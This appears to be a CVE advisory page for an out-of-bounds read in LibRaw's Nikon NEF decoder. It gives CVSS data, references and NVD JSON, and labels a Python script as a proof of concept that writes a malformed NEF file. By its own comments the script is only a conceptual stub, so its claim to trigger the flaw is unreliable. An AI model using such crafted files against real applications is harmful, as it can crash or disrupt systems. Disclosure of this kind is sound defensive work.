CVE-2026-5342

Description

A flaw has been found in LibRaw up to 0.22.0. This affects the function LibRaw::nikon_load_padded_packed_raw of the file src/decoders/decoders_libraw.cpp of the component TIFF/NEF. Executing a manipulation of the argument load_flags/raw_width can lead to out-of-bounds read. It is possible to launch the attack remotely. The exploit has been published and may be used. Upgrading to version 0.22.1 mitigates this issue. This patch is called b8397cd45657b84e88bd1202528d1764265f185c. It is advisable to upgrade the affected component.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:libraw:libraw:*:*:*:*:*:*:*:* - VULNERABLE

LibRaw <= 0.22.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-5342 (LibRaw Out-of-Bounds Read)
This script creates a malformed TIFF/NEF file that attempts to trigger
the vulnerability in LibRaw <= 0.22.0 by manipulating load_flags/raw_width.
"""
import struct

def create_malicious_nef(filename):
    with open(filename, 'wb') as f:
        # Minimal TIFF Header (Big Endian)
        f.write(b'\x4d\x4d\x00\x2a') # MM + 0x002A
        f.write(b'\x00\x00\x00\x08') # IFD0 offset
        
        # IFD0 with minimal tags to reach the problematic parser
        # This is a conceptual representation; actual offsets depend on LibRaw's parsing logic.
        # The goal is to trigger nikon_load_padded_packed_raw with bad params.
        
        num_tags = struct.pack('>H', 1)
        f.write(num_tags)
        
        # Tag 0x00FE (NewSubfileType), Type 4 (LONG), Count 1, Value 0
        f.write(struct.pack('>HHII', 0x00FE, 4, 1, 0))
        
        # Next IFD offset (0)
        f.write(b'\x00\x00\x00\x00')
        
        # Padding/Malicious data area to potentially trigger OOR
        # In a real exploit, specific Nikon tags would be crafted here.
        f.write(b'A' * 0x100) 

if __name__ == "__main__":
    print("[*] Generating malicious NEF file for CVE-2026-5342...")
    create_malicious_nef("poc_cve_2026_5342.nef")
    print("[+] File created: poc_cve_2026_5342.nef")
    print("[!] Use this file with an application embedding LibRaw <= 0.22.0 to test.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5342
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5342
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5342/
[4] VulDB https://vuldb.com/cve/CVE-2026-5342
[5] https://github.com/LibRaw/LibRaw/
[6] https://github.com/LibRaw/LibRaw/commit/b8397cd45657b84e88bd1202528d1764265f185c
[7] https://github.com/LibRaw/LibRaw/issues/795
[8] https://github.com/LibRaw/LibRaw/issues/795#issuecomment-4073769886
[9] https://github.com/LibRaw/LibRaw/releases/tag/0.22.1
[10] https://github.com/biniamf/pocs/tree/main/libraw_nikonpadded
[11] https://vuldb.com/submit/781223
[12] https://vuldb.com/vuln/354671
[13] https://vuldb.com/vuln/354671/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5342", "sourceIdentifier": "[email protected]", "published": "2026-04-02T15:16:53.343", "lastModified": "2026-04-29T19:39:24.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in LibRaw up to 0.22.0. This affects the function LibRaw::nikon_load_padded_packed_raw of the file src/decoders/decoders_libraw.cpp of the component TIFF/NEF. Executing a manipulation of the argument load_flags/raw_width can lead to out-of-bounds read. It is possible to launch the attack remotely. The exploit has been published and may be used. Upgrading to version 0.22.1 mitigates this issue. This patch is called b8397cd45657b84e88bd1202528d1764265f185c. It is advisable to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libraw:libraw:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.22.1", "matchCriteriaId": "E48D9289-6F64-4DBB-98D7-EB902084B2B9"}]}]}], "references": [{"url": "https://github.com/LibRaw/LibRaw/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/LibRaw/LibRaw/commit/b8397cd45657b84e88bd1202528d1764265f185c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/LibRaw/LibRaw/issues/795", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/LibRaw/LibRaw/issues/795#issuecomment-4073769886", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/LibRaw/LibRaw/releases/tag/0.22.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/biniamf/pocs/tree/main/libraw_nikonpadded", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/submit/781223", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354671", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/354671/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}